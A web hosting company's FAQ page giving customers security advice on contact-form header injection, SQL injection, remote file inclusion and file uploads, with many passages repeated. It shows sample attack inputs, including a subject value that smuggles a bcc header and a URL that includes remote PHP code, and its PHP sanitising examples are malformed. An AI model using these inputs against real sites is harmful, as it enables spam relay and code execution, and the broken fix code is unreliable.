Frequently Asked Questions
Log into your Control Panel, go to the website where you want to protect a folder.
Click on the "Directories". Click on "Add new directory". Enter the name of the folder, and choose a text to be displayed at login. Click OK.
Then click "Add new user" to create a user. Of course it is possible to create multiple users!
The files you wish to protect can then be put in the folder you specified!
Click on the "Directories". Click on "Add new directory". Enter the name of the folder, and choose a text to be displayed at login. Click OK.
Then click "Add new user" to create a user. Of course it is possible to create multiple users!
The files you wish to protect can then be put in the folder you specified!
Lately, it happens more often that there is abuse of standard contact forms. An example:
A contact consists of the fields:
Name (1 line)
Email address (1 line)
Subject (1 line)
Message (multiline).
The "Subject" field will appear in the subject. An example of a PHP command to send mail from this form may look like this:
mail ("info@mywebsite.com", $subject, $message);
The headers of this email will then look like this:
With spam form injection the subject is introduced as follows:
subject=This is the subject \\nbcc: test@test.com
The headers will then look like this:
This email is then sent not only to info@mywebsite.com but also to test@test.com and possibly multiple addresses entered.
We would therefore ask everyone to make sure to protect their contact form. A good plan to use this counter is to check the characters \\n and \\r when the field should not consist of more than one line.
Example:
$subject = str_replace ("\\r\\n '','''', $_POST [''subject'']);
A contact consists of the fields:
The "Subject" field will appear in the subject. An example of a PHP command to send mail from this form may look like this:
mail ("info@mywebsite.com", $subject, $message);
The headers of this email will then look like this:
To: info@mywebsite.com
Subject: $subject
With spam form injection the subject is introduced as follows:
subject=This is the subject \\nbcc: test@test.com
The headers will then look like this:
To: info@mywebsite.com
Subject: This is the subject
bcc: test@test.com
This email is then sent not only to info@mywebsite.com but also to test@test.com and possibly multiple addresses entered.
We would therefore ask everyone to make sure to protect their contact form. A good plan to use this counter is to check the characters \\n and \\r when the field should not consist of more than one line.
Example:
$subject = str_replace ("\\r\\n '','''', $_POST [''subject'']);
Make sure when inserting texts that could be changed by the visitor, the variable is between '.
example:
$result = mysql_query ("INSERT INTO table (id, text) VALUES ('', '' mysql_real_escape_string ($text) '').".)
If you don't do this, the visitor can customize the query by putting a 'in the text and then start a new query.
example:
$result = mysql_query ("INSERT INTO table (id, text) VALUES ('', '' mysql_real_escape_string ($text) '').".)
If you don't do this, the visitor can customize the query by putting a 'in the text and then start a new query.
If within 3 minutes you have more than 5 wrong attempts to log into Plesk, you will be locked out for 30 minutes. After 30 minutes you can try again.
No time to wait? Please contact us.
No time to wait? Please contact us.
Because in many standard scripts (eg. Joomla) exploits are possible where external code can be executed to cause damage, we have decided to disallow to open files from other Web sites from PHP. This applies to the following commands:
fopen
include
requirement
include_once
require_once
file
Of course there are plenty of reasons your website might need to load files from external webservers. If your web site also requires this,
Of course there are plenty of reasons your website might need to load files from external webservers. If your web site also requires this,
Many people load pages by using a template and load it to a file.
EG: index.php page = voorpagina.php?
The file "voorpagina.php" is then loaded through an include.
Do not do this! By filling in: index.php?page=http: //www.test.com/phpcode.php can allow the user to perform remote code through your script, this is very dangerous!
It is better to work with a header and footer, but if this is not appropriate, it is better to check if the file is on the current server, for example to see if there is a ":" in the $page variable.
EG: index.php page = voorpagina.php?
The file "voorpagina.php" is then loaded through an include.
Do not do this! By filling in: index.php?page=http: //www.test.com/phpcode.php can allow the user to perform remote code through your script, this is very dangerous!
It is better to work with a header and footer, but if this is not appropriate, it is better to check if the file is on the current server, for example to see if there is a ":" in the $page variable.
If you allow visitors to upload files, you must make sure that no malicious PHP and other code can be uploaded.
Therefore, check the file extension of the file that is uploaded, so for example .php is not possible!
Therefore, check the file extension of the file that is uploaded, so for example .php is not possible!
About us
Since 2004 TotallyHosted provides excellent web hosting to individuals and businesses. We provide reliable, fast web hosting at an affordable price.
Dutch Chamber of Commerce: 77650093
Follow us
Payment methods
Contact
TotallyHosted BV
Keurenplein 41 – Box E9500
1069CD Amsterdam, Netherlands
+31 (0) 36 523 2266
info@totallyhosted.nl
https://www.totallyhosted.nl
Keurenplein 41 – Box E9500
1069CD Amsterdam, Netherlands
+31 (0) 36 523 2266
info@totallyhosted.nl
https://www.totallyhosted.nl
2004-2024 © TotallyHosted. Terms and conditions | Privacy Statement | Sitemap | Abuse report
All prices are excluding VAT.